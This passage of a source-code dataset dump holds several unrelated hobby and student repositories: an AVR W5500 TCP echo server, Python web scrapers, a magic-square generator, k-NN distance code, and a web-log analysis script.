"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <avr/io.h>\n#include <avr/interrupt.h>\n#include <util/delay.h>\n#include \"socket.h\"\n#include \"tcp_server.h\"\n#include \"uart.h\"\n\n#define MAC 0x44, 0xFF, 0xFF, 0x00, 0x00, 0x00\n#define IP 192, 168, 1, 110 \n#define SUBNET 255, 255, 255, 0 \n#define GATEWAY 192, 168, 1, 1 \n#define DNS 8, 8, 8, 8\n\n#pragma message(\"Wizchip ID: \" _WIZCHIP_ID_)\n\nvoid initSPI()\n{\n DDRB |= (1 << PB5) | (1 << PB3) | (1 << PB2); //sck, mosi, ss outputs\n SPCR |= (1 << SPE) | (1 << MSTR);\n}\n\nvoid initTCNT0()\n{\n TIMSK0 |= (1 << TOIE0); //enable overflow interrupt \n TCCR0B |= (1 << CS02) | (1 << CS00); //1024 prescaling\n}\n\nvoid disableTCNT0()\n{\n TCCR0B = 0;\n}\n\nvoid enableTCNT0()\n{\n TCCR0B |= (1 << CS02) | (1 << CS00); //1024 prescaling\n}\n\nISR(TIMER0_OVF_vect)\n{\n uint8_t s0_ir = getSn_IR(0);\n\n if(!bit_is_clear(s0_ir, 2))\n {\n writeString(\"recv interrupt received!\\r\\n\");\n setSn_IR(0, (s0_ir & (1 << 2))); //clear interrupt\n PORTB ^= (1 << 0);\n }\n}\n\nint32_t loopback_tcps(uint8_t sn, uint8_t* buf, uint16_t port)\n{\n int32_t ret;\n uint16_t size = 0, sentsize=0;\n\n switch(getSn_SR(sn))\n {\n case SOCK_ESTABLISHED :\n if(getSn_IR(sn) & Sn_IR_CON)\n {\n\t\t\tsetSn_IR(sn,Sn_IR_CON);\n }\n\t\t if((size = getSn_RX_RSR(sn)) > 0) // Don't need to check SOCKERR_BUSY because it doesn't not occur.\n {\n\t\t\tif(size > DATA_BUF_SIZE) size = DATA_BUF_SIZE;\n\t\t\tret = recv(sn, buf, size);\n\n\t\t\tif(ret <= 0) return ret; // check SOCKERR_BUSY & SOCKERR_XXX. For showing the occurrence of SOCKERR_BUSY.\n\t\t\tsize = (uint16_t) ret;\n\t\t\tsentsize = 0;\n\n\t\t\twhile(size != sentsize)\n\t\t\t{\n writeNumChar(\"First char received: \", *buf, 10);\n\t\t\t\tret = send(sn, buf+sentsize, size-sentsize);\n\t\t\t\tif(ret < 0)\n\t\t\t\t{\n\t\t\t\t\tclose(sn);\n\t\t\t\t\treturn ret;\n\t\t\t\t}\n\t\t\t\tsentsize += ret; // Don't care SOCKERR_BUSY, because it is zero.\n\t\t\t}\n }\n break;\n case SOCK_CLOSE_WAIT :\n if( (ret = disconnect(sn)) != SOCK_OK) return ret;\n break;\n case SOCK_INIT :\n if( (ret = listen(sn)) != SOCK_OK) return ret;\n break;\n case SOCK_CLOSED:\n if( (ret = socket(sn, Sn_MR_TCP, port, 0x00)) != sn) return ret;\n default:\n break;\n }\n return 1;\n}\n\nint main()\n{\n initUART();\n initSPI();\n //initTCNT0();\n DDRB |= (1 << 0);\n\n uint8_t buf[1000];\n\n struct wiz_NetInfo_t network_config = \n {\n {MAC},\n {IP},\n {SUBNET},\n {GATEWAY},\n {DNS},\n 2\n };\n\n struct wiz_NetInfo_t temp;\n\n uint8_t txsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n uint8_t rxsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n\n //setup delay\n _delay_ms(2000);\n\n writeNumChar(\"Init return: \", wizchip_init(txsize, rxsize), 10);\n wizchip_setnetinfo(&network_config);\n wizchip_getnetinfo(&temp);\n\n writeNumChar(\"ip[0]: \", temp.ip[0], 10);\n writeNumChar(\"ip[1]: \", temp.ip[1], 10);\n writeNumChar(\"ip[2]: \", temp.ip[2], 10);\n writeNumChar(\"ip[3]: \", temp.ip[3], 10);\n\n writeNumChar(\"version: \", getVERSIONR(), 16);\n writeNumShort(\"retry count: \", getRTR(), 10);\n\n sei(); //enable global interrupts\n\n while(1)\n {\n //disableTCNT0();\n loopback_tcps(0, buf, 8080);\n writeNumChar(\"Socket 0 SR: \", getSn_SR(0), 16);\n //enableTCNT0();\n _delay_ms(500);\n }\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6291600465774536,
"alphanum_fraction": 0.6339144110679626,
"avg_line_length": 18.41538429260254,
"blob_id": "cd2258c3f3518e35e83789fda0583b979137d98b",
"content_id": "773b0e0a2cd7edcee40dbd77f4010294e576e2fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1262,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 65,
"path": "/src/fsm.c",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#include \"fsm.h\"\n\nret_id idle_state(int8_t* status)\n{\n return OK;\n}\n\nret_id ignition_state(int8_t* status)\n{\n return OK;\n}\n\nret_id fueling_state(int8_t* status)\n{\n return OK;\n}\n\nret_id error_state(int8_t* status)\n{\n return OK;\n}\n\n/*\n * Initialize an array of states (up to NUM_STATES) with their \n * respective state id, status (0 at start), and state function\n * passed address of the specific state's status (do this with switch)\n */\nvoid init_sm(state_t* states)\n{\n}\n\n/*\n * Check the prev state's status, if it was non-zero\n *\n */\nstate_id sm_engine(state_t* curr_state)\n{\n //run the current state\n //if its ret id is not FAIL, then\n //use lookup table to determine and return next state\n //else\n //update error state with error status of prev failed state\n //go-to error state and handle error, reset status\n \n return OK;\n}\n\nint main()\n{\n //declare an array of states\n state_t states[NUM_STATES];\n\n //init the states\n //prime state machine engine with entry state\n //e.g. state_t curr_state = states[ENTRY_STATE];\n\n for(;;)\n {\n //run the engine and update state\n //e.g. state_id next_state = sm_engine(&curr_state);\n //curr_state = states[next_state];\n }\n \n return 0;\n}\n"
},
{
"alpha_fraction": 0.6218487620353699,
"alphanum_fraction": 0.6554622054100037,
"avg_line_length": 25.33333396911621,
"blob_id": "6e3ba530484def6f539a89e1450290cf307ab9d0",
"content_id": "70ba40d1be19b485b7b732aa894fd6d37c0888f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 238,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 9,
"path": "/lib/ioLibrary_Driver/Ethernet/wizchip_select.h",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#ifndef _WIZCHIP_SELECT_H_\n#define _WIZCHIP_SELECT_H_\n\n//Select W5500\n#define _WIZCHIP_ W5500\n//Set I/O mode to use SPI rather than BUS\n#define _WIZCHIP_IO_MODE_ _WIZCHIP_IO_MODE_SPI_VDM_\n\n#endif //_WIZCHIP_SELECT_H_\n\n"
}
] | 8 |
Resolvation/ml-homeworks
|
https://github.com/Resolvation/ml-homeworks
|
27517827bf878cc204e164cb9362c2179d73ed5c
|
b66355327ac0e196bb56644ff6bfcf801184a625
|
70f0619bb1ff85ac74e578a1c83e943c92efeedd
|
refs/heads/master
| 2019-03-20T01:28:01.513621 | 2018-10-22T21:26:08 | 2018-10-22T21:26:08 | 123,813,032 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5423387289047241,
"alphanum_fraction": 0.6169354915618896,
"avg_line_length": 32.06666564941406,
"blob_id": "4a57df5acf26accd4fdfec6c97e4311ff9acc880",
"content_id": "bf9f60bb68105e285a1f2c075e76976eab5816d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/tmp.py",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport nearest_neighbors as nn\n\nknn = nn.KNNClassifier(k=3, strategy='my_own')\nknn2 = nn.KNNClassifier(k=3)\nx = np.array([[1], [2], [3], [4], [5]])\ny = np.array([43, 12, 12, 12, 12])\nknn.fit(x, y)\nknn2.fit(x, y)\nprint('fitted succesfully')\nprint(knn.find_kneighbors(np.array([[1], [4.5], [5]])))\nprint(knn2.find_kneighbors(np.array([[1], [4.5], [5]])))\nprint('found succesfully')\nprint(knn.predict(np.array([[1], [4.5], [5]])))\nprint(knn2.predict(np.array([[1], [4.5], [5]])))\n"
},
{
"alpha_fraction": 0.8450704216957092,
"alphanum_fraction": 0.8450704216957092,
"avg_line_length": 70,
"blob_id": "1d68219590ae252ecb95f388101e8a457cc1bc0c",
"content_id": "9bdd01391233608cfdaf77b7c0eddb5761a71b58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 1,
"path": "/README.md",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "# Репозитория для хранения практических заданий по машинному обучению.\n"
},
{
"alpha_fraction": 0.8054607510566711,
"alphanum_fraction": 0.8054607510566711,
"avg_line_length": 116.19999694824219,
"blob_id": "e9e057a90f97643561b959e86eef57c3757ef153",
"content_id": "3c75ec6bc4ca78ab43134ae0f3f84aa5e68c4918",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2096,
"license_type": "no_license",
"max_line_length": 339,
"num_lines": 10,
"path": "/KNN/README.md",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "## Выводы:\n**По алгоритмам**: brute - универcальный, работает с любыми метриками, не сильно проседает от количесва признаков, kd_tree, ball_tree - чуть быстрей при маленьком количесве признаков, но сильно проседают при большом, вероятней всего изза пред просчета.\n\n**По метрикам**: косинусная определенно лучше, хоть чуть проседает по скорости. Думаю это изза того, что она должна лучше работать на обьектах в большим количеством нулевых признаков(евклидова практически не будет из отличать).\n\n**По весам**: в обоих задачах выгодней было использовать веса. Особенно большую пользу принесло на обработке текста. Видимо это позволяет не так сильно выделять длинные предложения.\n\n**По ошибкам**: в первом задании ошибки, в основном на смазанных обьектах, во втором - на очень коротких предложениях или без использования терминологии.\n\n**По оптимизации**: в первом случае можно выбирать не всю матрицу, а только ее участки, это позволит избежать части ошибок на смазанных объектах. Во втором стоит выбросить предлоги или снизить их вес и наоборот повысить вес терминов. Можно попробовать выделить эталоны и увеличить их вес. При работе с весами можно поэкспериметировать с е.\n"
},
{
"alpha_fraction": 0.6243016719818115,
"alphanum_fraction": 0.6354748606681824,
"avg_line_length": 33.095237731933594,
"blob_id": "a988ad0446738b40ee8ee23ce5778a8f8369f78e",
"content_id": "03b6572e553ddd9c0ec1335a4dd0b1258098ec7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 716,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 21,
"path": "/distances.py",
"repo_name": "Resolvation/ml-homeworks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom numpy.linalg import norm\n\n\ndef squared_l2_norm(x):\n '''Square of vector L2 norm.'''\n return np.sum(np.multiply(x, x))\n\n\ndef euclidean_distance(X, Y):\n '''Matrix of euclidean distances between elements of matrix X and Y.'''\n s_X_norms = np.array([squared_l2_norm(x) for x in X])\n s_Y_norms = np.array([squared_l2_norm(y) for y in Y])\n X_by_Y = np.matmul(X, np.transpose(Y))\n return np.sqrt(s_Y_norms[np.newaxis, :] + s_X_norms[:, np.newaxis] - 2*X_by_Y)\n\n\ndef cosine_distance(X, Y):\n '''Matrix of cosine distances between elements of matrix X and Y.'''\n X_by_Y = np.matmul(X, np.transpose(Y))\n return 1 - X_by_Y / norm(X, axis=1)[:, np.newaxis] / norm(Y, axis=1)\n"
}
] | 4 |
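The `euclidean_distance()` helper in `distances.py` above relies on the identity ||x - y||^2 = ||x||^2 + ||y||^2 - 2 x.y to build the full distance matrix without an explicit double loop. A quick self-contained numerical check of that vectorization (random data, not part of the homework):

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(4, 3))
Y = rng.normal(size=(5, 3))

# Vectorized form, as in euclidean_distance() above.
D = np.sqrt((X**2).sum(axis=1)[:, None] + (Y**2).sum(axis=1)[None, :] - 2 * X @ Y.T)

# Naive double-loop reference.
D_ref = np.array([[np.linalg.norm(x - y) for y in Y] for x in X])
assert np.allclose(D, D_ref)
```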
saloni-080601/webscraping
|
https://github.com/saloni-080601/webscraping
|
f80399296f46ab5a707dd680581568bbfbe686bd
|
c6d02c11f354f681d6f5582aabe413db3445a150
|
8723a1acdcd3c88edc6b86e63a3428b6d1759ad4
|
refs/heads/main
| 2023-07-15T12:26:34.240422 | 2021-08-30T08:06:09 | 2021-08-30T08:06:09 | 401,244,023 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6247059106826782,
"alphanum_fraction": 0.6411764621734619,
"avg_line_length": 27.366666793823242,
"blob_id": "ad0ac22c82d82f52c88e3e52ff6a2ae516c1599c",
"content_id": "5d3ad164b8e24bf8fbdeb37f18287c19511e7ac1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 850,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 30,
"path": "/e_commerce.py",
"repo_name": "saloni-080601/webscraping",
"src_encoding": "UTF-8",
"text": "from ast import dump\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pprint\nurl=\"https://webscraper.io/test-sites\"\nRes=requests.get(url)\nhtmlcontent=Res.content\nsoup=BeautifulSoup(htmlcontent,\"html.parser\")\ndiv=soup.find('div',class_='container test-sites')\ndiv1=div.find_all('div',class_='col-md-7 pull-right')\ndef e_commerce():\n list1=[]\n s=1\n details={'postion':s,'name':'','link':''}\n for i in range(0,len(div1)):\n details['name']=div1[i].a.get_text().strip()\n\n e_commerce_link=div1[i].a['href']\n details['link']=\"https://webscraper.io\"+e_commerce_link\n list1.append(details)\n s+=1\n details={'postion':s,'name':'','link':''}\n # print(details)\n with open('e_commerce.json','w') as j:\n json.dump(list1,j,indent=5)\n\n return list1\n\npprint.pprint(e_commerce())"
},
{
"alpha_fraction": 0.2514285743236542,
"alphanum_fraction": 0.3199999928474426,
"avg_line_length": 13.272727012634277,
"blob_id": "57e36a63e9bd79f331e8ee5edc135ea6598df702",
"content_id": "d8ffc4d17910a79754367aefe7fa5707960464b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 175,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 11,
"path": "/text ques.py",
"repo_name": "saloni-080601/webscraping",
"src_encoding": "UTF-8",
"text": "i=1\nwhile i<=1000:\n j=1\n f=0\n while i>=j:\n if i%j==0:\n f=f+1\n j+=1\n if f==2:\n print(i,\"it is prime no\")\n i+=1\n\n \n "
},
{
"alpha_fraction": 0.5534433126449585,
"alphanum_fraction": 0.5624103546142578,
"avg_line_length": 28.659574508666992,
"blob_id": "edd39dd0c2ec6314c284363582d15df727104019",
"content_id": "e457e8094eae0ce5ee801315766db9a05e986920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2788,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 94,
"path": "/ws.py",
"repo_name": "saloni-080601/webscraping",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pprint\nurl=\"https://www.imdb.com/india/top-rated-indian-movies/\"\nRes=requests.get(url)\n\n# print(Res.text)\nhtmlcontent=Res.content\nsoup=BeautifulSoup(htmlcontent,\"html.parser\")\ndef scrab_top_list():\n main_div=soup.find('div', class_='lister')\n tbody=main_div.find('tbody',class_='lister-list')\n trs=tbody.find_all('tr')\n movie_ranks=[]\n movie_name=[]\n year_of_realease=[]\n movie_url=[]\n movie_ratings=[]\n for tr in trs:\n postion=tr.find('td',class_='titleColumn').get_text().strip()\n rank=''\n for i in postion:\n if '.' not in i:\n rank=rank+i\n movie_ranks.append(rank)\n title=tr.find('td',class_='titleColumn' ).a.get_text()\n movie_name.append(title)\n year=tr.find('td',class_=\"titleColumn\").span.get_text()\n year_of_realease.append(year)\n imdb_rating=tr.find('td',class_=\"ratingColumn imdbRating\").strong.get_text()\n movie_ratings.append(imdb_rating)\n link=tr.find('td',class_=\"titleColumn\").a[\"href\"]\n movie_link=\"https://www.imdb.com\" + link\n movie_url.append(movie_link)\n Top_movies = []\n details={'postion':'','name':'','year':'','rating':'','url':''}\n for i in range(0,len(movie_ranks)):\n details['postion']=movie_ranks[i]\n details['name']=str(movie_name[i])\n details['year']=int(year_of_realease[i][1:5])\n details['rating']=float(movie_ratings[i])\n details['url']=movie_url[i]\n Top_movies.append(details)\n details={'postion':'','name':'','year':'','rating':'','url':''}\n with open ('postion.json',\"w\") as u:\n json.dump(Top_movies,u,indent=5) \n return (Top_movies)\n\nscrabbed=(scrab_top_list()) \n\ndef group_of_year(movies):\n \n year=[]\n dict1={}\n for i in movies:\n if i['year'] not in year:\n year.append(i['year'])\n for j in year:\n list1=[]\n for k in movies:\n if j==k['year']:\n list1.append(k)\n dict1.update({j:list1})\n with open ('web.json',\"w\") as u:\n json.dump(dict1,u,indent=5)\n return dict1\n \n\n \ndec=group_of_year(scrabbed)\n\ndef group_of_dec(movies):\n list1=[]\n moviedec={}\n for i in movies:\n some=i%10\n decade=i-some\n if decade not in list1:\n list1.append(decade)\n list1.sort()\n for i in list1:\n moviedec[i]=[]\n for j in moviedec:\n dec1=j+9 \n list2=[] \n for k in movies:\n if k<=dec1 and k>=j:\n for x in movies[k]:\n moviedec[j].append(x)\n with open ('scrab.json',\"w\") as u:\n json.dump(moviedec,u,indent=5)\n return(moviedec)\npprint.pprint(group_of_dec(dec))\n"
},
{
"alpha_fraction": 0.5527479648590088,
"alphanum_fraction": 0.5773847103118896,
"avg_line_length": 30.058822631835938,
"blob_id": "971292306a84b556f2a3cc25862bc04eddf8d4cc",
"content_id": "b48e356ed1e35944aff6655a12707675e73e190b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1583,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 51,
"path": "/pickal.py",
"repo_name": "saloni-080601/webscraping",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pprint\n\ndef scrab_top_list():\n url1=\"https://paytmmall.com/shop/search?q=pickles&from=organic&child_site_id=6&site_id=2&category=101471\"\n page=requests.get(url1)\n soup=BeautifulSoup(page.text,'html.parser')\n div=soup.find('div',class_='_1gX7').span.get_text()\n \n var=int(div[1:5])\n \n var1=var//2\n print(var1)\n i=0\n pical_list=[]\n postion=1\n details={'postion':postion,'name':'','rate':'','link':''}\n while i<var1:\n url=\"https://paytmmall.com/shop/search?q=pickles&from=organic&child_site_id=6&site_id=2&category=101471&page=\"+str(i)\n Res=requests.get(url)\n htmlcontent=Res.content\n soup=BeautifulSoup(htmlcontent,\"html.parser\")\n main_div=soup.find(\"div\",class_=\"_3RA-\")\n main_div1=main_div.find_all(\"div\",class_=\"UGUy\")\n rate_div=soup.find_all('div',class_='_1kMS')\n # print(rate_div)\n url_div=soup.find_all('div',class_='_3WhJ')\n\n for j in range(0,len(main_div1)):\n \n details['name']=main_div1[j].get_text()\n details['rate']=rate_div[j].span.get_text()\n pikal_url=url_div[j].a['href']\n\n details['link']=\"https://paytmmall.com\"+pikal_url\n pical_list.append(details)\n \n\n details={'postion':postion,'name':'','rate':'','link':''}\n \n postion+=1\n i+=1\n\n continue\n\n with open('basic.json','w') as h:\n json.dump(pical_list,h,indent=5)\n \npprint.pprint(scrab_top_list())"
}
] | 4 |
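The `group_of_dec()` function in `ws.py` above reduces each release year to its decade with `year - year % 10` before bucketing. The same idea in isolation, with a small invented year list rather than the scraped IMDb data:

```python
from collections import defaultdict

years = [1994, 1997, 2001, 2008, 2013]
by_decade = defaultdict(list)
for y in years:
    by_decade[y - y % 10].append(y)  # 1994 -> 1990, 2008 -> 2000, ...

print(dict(by_decade))  # {1990: [1994, 1997], 2000: [2001, 2008], 2010: [2013]}
```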
tszming/tailon
|
https://github.com/tszming/tailon
|
a7963cba3d61959f25817833685fc387b7ed7963
|
4f372799d3e261b7fd88e76afe6d111bb9e5919c
|
162233d14d324bba506697636fbac95a70ce4579
|
refs/heads/master
| 2021-01-17T22:55:50.199775 | 2014-06-30T08:17:37 | 2014-06-30T08:17:37 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4935145080089569,
"alphanum_fraction": 0.5033971667289734,
"avg_line_length": 32.04081726074219,
"blob_id": "3ea9ad2d06bea94d30ddfdfc2eeaf287b08b8f56",
"content_id": "0eab742edd657cbeb60154c5957ba58e3b3cc34e",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1619,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 49,
"path": "/setup.py",
"repo_name": "tszming/tailon",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# encoding: utf-8\n\nfrom tailon import version\nfrom os.path import abspath, dirname, join\nfrom setuptools import setup\n\nclassifiers = (\n 'Development Status :: 4 - Beta',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'License :: OSI Approved :: BSD License',\n 'Intended Audience :: Developers',\n 'Operating System :: POSIX :: Linux',\n)\n\nkw = {\n 'name' : 'tailon',\n 'version' : version,\n 'description' : 'Webapp for looking at and searching through log files',\n 'long_description' : open(join(abspath(dirname(__file__)), 'README.rst')).read(),\n 'author' : 'Georgi Valkov',\n 'author_email' : '[email protected]',\n 'license' : 'Revised BSD License',\n 'url' : 'https://github.com/gvalkov/tailon',\n 'keywords' : 'log monitoring tail',\n 'classifiers' : classifiers,\n 'packages' : ['tailon'],\n 'install_requires' : [\n 'tornado>=3.2.0',\n 'sockjs-tornado==1.0.0',\n 'PyYAML>=3.10'],\n 'entry_points' : {'console_scripts': ['tailon = tailon.main:main']},\n 'zip_safe' : False,\n 'package_data' : {\n 'tailon' : ['../assets/js/vendor/*',\n '../assets/js/main.js',\n '../assets/css/*',\n '../assets/favicon.ico',\n '../assets/fonts/*',\n '../templates/*',\n ]\n },\n 'include_package_data': False,\n}\n\nif __name__ == '__main__':\n setup(**kw)\n"
}
] | 1 |
srodewal/CSE294_HW4
|
https://github.com/srodewal/CSE294_HW4
|
a148bc3d0dcfeb8ec583d04269b752c29af385bf
|
6fb3a44ae0b500e5e5edaeb982a72003d0364c4f
|
9d0928d7afb5626b0c275a2bcd98cf627dd567a2
|
refs/heads/master
| 2016-04-16T05:58:21.671891 | 2016-02-29T21:49:03 | 2016-02-29T21:49:03 | 52,827,346 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5879611372947693,
"alphanum_fraction": 0.6019417643547058,
"avg_line_length": 31.1875,
"blob_id": "fac04e32cda6ddc03c665ff70f10caa4c97bfa96",
"content_id": "0e9f34ac4065bea4a4466b17b8020366a2a4d184",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2575,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 80,
"path": "/magic_nxn.py",
"repo_name": "srodewal/CSE294_HW4",
"src_encoding": "UTF-8",
"text": "# Implementation of Pseudocode Written by Spencer\n\nimport math\n\ndef create_magic_square_nxn(n):\n magicSquare = [[0 for row in range(0,n)] for col in range(0,n)] # create n by n array of 0's\n currRowSpace = 0\n currColSpace = int(math.floor(n/2))\n magicSquare[currRowSpace][currColSpace] = 1\n #squaredN = n*n\n for i in range(2,n*n+1):\n nextRowSpace = (currRowSpace-1)%n\n nextColSpace = (currColSpace+1)%n\n if magicSquare[nextRowSpace][nextColSpace] != 0:\n nextRowSpace = (currRowSpace+1)%n\n nextColSpace = currColSpace\n magicSquare[nextRowSpace][nextColSpace] = i\n currRowSpace = nextRowSpace\n currColSpace = nextColSpace\n return magicSquare\n\ndef output_magic_square_nxn(magicSquare, n):\n rowSum, isCorrect = compute_Row_Sum(magicSquare, n)\n colSum, isCorrect = compute_Column_Sum(magicSquare, n)\n diagSum, isCorrect = compute_Diagonal_Sum(magicSquare, n)\n for row in range(0,n):\n for col in range(0,n):\n print(\"%4d\" % magicSquare[row][col]),\n print(\" \"),\n #print(str(magicSquare[row][col]) + \" \"),\n print(\" \")\n print(\"Row sum is: %d\" % rowSum)\n print(\"Column sum is: %d\" % colSum)\n print(\"Diagonal sum is: %d\" % diagSum)\n\ndef compute_Row_Sum(magicSquare, n):\n rowSum = 0\n isEqual = True\n for row in range(0,n):\n if rowSum is 0:\n rowSum = sum(magicSquare[row])\n else:\n if sum(magicSquare[row]) != rowSum:\n isEqual = False\n rowSum = -1\n return (rowSum, isEqual)\n\ndef compute_Column_Sum(magicSquare, n):\n columnSums = [0 for col in range(0,n)]\n colSum = 0\n isEqual = True\n for i in range(0,n):\n for j in range(0,n):\n columnSums[j] += magicSquare[i][j]\n colSum = columnSums[0] # if all equal will return this\n if n != 1:\n for spot in range(0, n-1):\n if columnSums[spot] != columnSums[spot+1]:\n isEqual = False\n colSum = -1\n return (colSum, isEqual)\n\ndef compute_Diagonal_Sum(magicSquare, n):\n sumFirstDiagonal = 0\n sumSecondDiagonal = 0\n for i in range(0,n):\n sumFirstDiagonal += magicSquare[i][i]\n sumSecondDiagonal += magicSquare[i][n-i-1]\n if sumFirstDiagonal == sumSecondDiagonal:\n return (sumFirstDiagonal, True)\n else:\n return (-1, False)\n\ndef main():\n print(\"Please enter n: \")\n size = int(raw_input())\n magicSquare = create_magic_square_nxn(size)\n output_magic_square_nxn(magicSquare, size)\n\nmain()\n"
}
] | 1 |
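For odd n, the Siamese construction used in `magic_nxn.py` above always yields rows, columns, and diagonals that sum to the magic constant n(n^2 + 1)/2, which gives a one-line check of the sum routines. A compact re-implementation, inlined so the snippet is self-contained:

```python
def siamese(n):
    """Siamese (De la Loubere) method; n must be odd."""
    sq = [[0] * n for _ in range(n)]
    r, c = 0, n // 2
    for v in range(1, n * n + 1):
        sq[r][c] = v
        nr, nc = (r - 1) % n, (c + 1) % n  # move up-right...
        if sq[nr][nc]:
            nr, nc = (r + 1) % n, c        # ...or down if occupied
        r, c = nr, nc
    return sq

n = 5
square = siamese(n)
magic = n * (n * n + 1) // 2
assert all(sum(row) == magic for row in square)
assert all(sum(col) == magic for col in zip(*square))
```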
williamwaffles/IS211_Assignment3
|
https://github.com/williamwaffles/IS211_Assignment3
|
8625dbc1d39ec3b45a90493b6b0ae71a9bbf296d
|
7ded2218848a4ca7b9ae5127d9a577fd2c7eb2e9
|
2ea3ecb154ca04cbfa36c7bc58c3a1304bfe0560
|
refs/heads/main
| 2023-08-06T19:37:55.651013 | 2021-09-22T13:34:52 | 2021-09-22T13:34:52 | 406,927,619 | 0 | 1 | null | 2021-09-15T21:18:34 | 2020-10-26T02:28:54 | 2020-10-26T02:28:52 | null |
[
{
"alpha_fraction": 0.6315789222717285,
"alphanum_fraction": 0.8421052694320679,
"avg_line_length": 18,
"blob_id": "f3f963b4f275698f368a638466f19c6272552286",
"content_id": "fa6ee3e641c83db0e41b0eb2a57371925477d1d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 2,
"path": "/README.md",
"repo_name": "williamwaffles/IS211_Assignment3",
"src_encoding": "UTF-8",
"text": "# IS211_Assignment3\nIS211_Assignment3\n"
},
{
"alpha_fraction": 0.6013234257698059,
"alphanum_fraction": 0.6137303709983826,
"avg_line_length": 34.485294342041016,
"blob_id": "6a9e7e6ab6691960c4d2296f48d8bcc0bb1921ca",
"content_id": "8e3caf40288ca281dafc32b0512417cd7653d99c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2418,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 68,
"path": "/assignment3.py",
"repo_name": "williamwaffles/IS211_Assignment3",
"src_encoding": "UTF-8",
"text": "import argparse\nimport re\nimport csv\nimport urllib.request\n\nfile_url = ('http://s3.amazonaws.com/cuny-is211-spring2015/weblog.csv')\n\ndef downloadData(url): # Part I/II - Pulls and processes csv file\n\n fetch_url = urllib.request.urlopen(url)\n data = fetch_url.read().decode('utf-8')\n file = data.splitlines()\n file_reader = csv.reader(file)\n csv_list = (list(file_reader))\n return csv_list\n\ndef processImgData(file): # Part III - Search csv for image type hits\n\n img_hits = 0\n row_count = 0\n\n for line in file:\n print(line[0])\n row_count += 1\n img_search = re.search(r'jpg|gif|png', line[0], re.IGNORECASE) # check for .jpg, .gif, .png\n if img_search:\n img_hits += 1\n\n img_percentage = (img_hits / row_count) * 100\n # prints out image requests, total requests, and percentage of requests that were for image files\n print(f'There are a total of {img_hits} image requests in this file.')\n print(f'There are a total of {row_count} requests in this file.')\n print(f'Image requests account for {img_percentage}% of all requests!')\n\ndef popularBrowser(file): # Counts the browsers used to access files, finds most popular\n\n browser = { 'Firefox' : 0,\n 'Chrome' : 0,\n 'Internet Explorer' : 0,\n 'Safari' : 0}\n\n for line in file:\n if re.search('Firefox', line[2]):\n browser['Firefox'] += 1\n elif re.search('Chrome', line[2]):\n browser['Chrome'] += 1\n elif re.search('Safari', line[2]):\n browser['Safari'] += 1\n elif re.search('Windows NT|MSIE', line[2]):\n browser['Internet Explorer'] += 1\n\n pop_browser = max(browser, key=browser.get) # finds most popular browser by key\n browser_count = browser.values()\n max_value = max(browser_count) # most popular browser by value\n print(f'The most popular browser is {pop_browser} with {max_value} users!')\n\ndef main(url):\n print(f\"Running main with URL = {url}...\")\n #print(downloadData(file_url))\n processImgData(downloadData(file_url))\n popularBrowser(downloadData(file_url))\n\nif __name__ == \"__main__\":\n \"\"\"Main entry point\"\"\"\n parser = argparse.ArgumentParser()\n 